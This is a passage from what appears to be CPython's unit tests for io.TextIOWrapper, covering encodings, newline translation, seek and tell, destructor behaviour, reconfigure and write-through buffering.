'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(support.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
f = self.open(support.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __del__(self):
io.TextIOWrapper(io.BytesIO(), **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig has not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
